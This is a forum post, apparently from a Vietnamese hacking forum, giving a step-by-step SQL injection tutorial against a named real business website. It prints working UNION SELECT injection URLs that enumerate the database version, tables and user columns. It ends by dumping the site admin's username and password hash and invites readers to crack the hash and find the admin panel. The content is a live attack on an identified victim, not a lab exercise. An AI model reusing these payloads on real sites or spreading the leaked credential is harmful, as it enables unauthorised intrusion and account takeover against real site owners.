• Downloading from our site will require you to have a paid membership. Upgrade to a Premium Membership from 10$ a month today!

    Dont forget read our Rules! Also anyone caught Sharing this content will be banned. By using this site you are agreeing to our rules so read them. Saying I did not know is simply not an excuse! You have been warned.

KhangSkull

Active Member
Staff member
Moderator
- victim: We are sory for any inconvenience - Chúng tôi xin lỗi vì sự bất tiện này!!!!

__đầu tiên xác định lỗi: thêm ( ' ) vào trước ( .html ) và dấu ( - ) vào trước chữ ( may )
=> ta được: http://www.maychieuchothue.com/ho-tr...diem'.html

=> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''-may-chieu-cong-nghe-lcd-va-dlp-uu-nhuoc-diem''' at line 3

__ xác định số column: http://www.maychieuchothue.com/ho-tr...-uu-nhuoc-diem' order by 3-- -.html

* chú ý: không có cái này không được nhé ( -- - )
=> Unknown column '3' in 'order clause'
http://www.maychieuchothue.com/ho-tr...-uu-nhuoc-diem' order by 2-- -.html

=>> không lỗi, vậy nó có 2 column
chỉ có 2 column thôi nên bỏ qua bước xem nó lỗi ở table nào nhé ! ở đây nó lỗi ở số 2

___xác định verseion: http://www.maychieuchothue.com/ho-tr...-uu-nhuoc-diem' union select 1,@@version-- -.html

=> ta đc: 5.5.8
__tiếp theo mình sẽ get table:
http://www.maychieuchothue.com/ho-tr...-uu-nhuoc-diem' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()-- -.html

=> ta được: chungtoi,gioithieu,hotro,loaisb,loaisp,sanpham,sid ebar,user,yahoo

tới đây mình tập trung vào table: user

__ get column từ table user:
http://www.maychieuchothue.com/ho-tr...-uu-nhuoc-diem' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x75736572-- -.html

***: 75736572 đây chữ user sau khi chuyển sang dạng hex, bắt buộc phải làm cái này !

=> ta được 1 đóng như thê này:
id,name,username,password,thuTu,id,name,username,p assword,thuTu,username,password,username,password, userid,usergroupid,membergroupids,displaygroupid,u sername,password,passworddate,email,styleid,parent email,homepage,icq,aim,yahoo,msn,skype,showvbcode, showbirthday,usertitle,customtitle,joindate,dayspr une,lastvisit,lastactivity,lastpost,lastpostid,pos ts,reputation,reputationlevelid,timezoneoffset,pmp opup,avatarid,avatarrevision,profilepicrevision,si gpicrevision,options,birthday,birthday_search,maxp osts,startofweek,ipaddress,referrerid,languageid,e mailstamp,threadedmode,autosubscribe,pmtotal,pmunr ead,salt,ipoints,infractions,warnings,infractiongr oupids,infractiongroupid,adminoptions,profilevisit s,friendcount,friendreqcount,vmunreadcount,vmmoder atedcount,socgroupinvitecount,socgroupreqcount,pcu nreadcount,pcmoderatedcount,gmmoderatedcount,asset posthash,fbuserid,fbjoindate,fbname,logintype,fbac cesstoken,newrepcount,post_thanks_user_amount,post _thanks_thanked_posts,post_thanks_thanked_times,to pxtab,topxmenu,topxresul

- các bạn đừng có hoa mắt, chúng ta chỉ tập trung vào: username và password thôi, mấy cái kìa get cũng chỉ đc cái thông báo "not found" chứ chẳng có gì đâu

___ get data:
http://www.maychieuchothue.com/ho-tr...-uu-nhuoc-diem' union select 1,group_concat(username,0x7c,password) from user-- -.html

=> ta được: admin|d9e0c8391e50ab616cd531b5bcb95c7e

việc còn lại là tìm cpanel của admin và crack password, ở đây password này mình không crack được, ai crack được thì crack nhé

tới đây hết nhé, có gì không đúng các bác đóng góp ý kiến nhé, mình cũng newbie thôi
_______End TuT_______

Nguồn : leech
 

Facebook Comments

New posts New threads New resources

Back
Top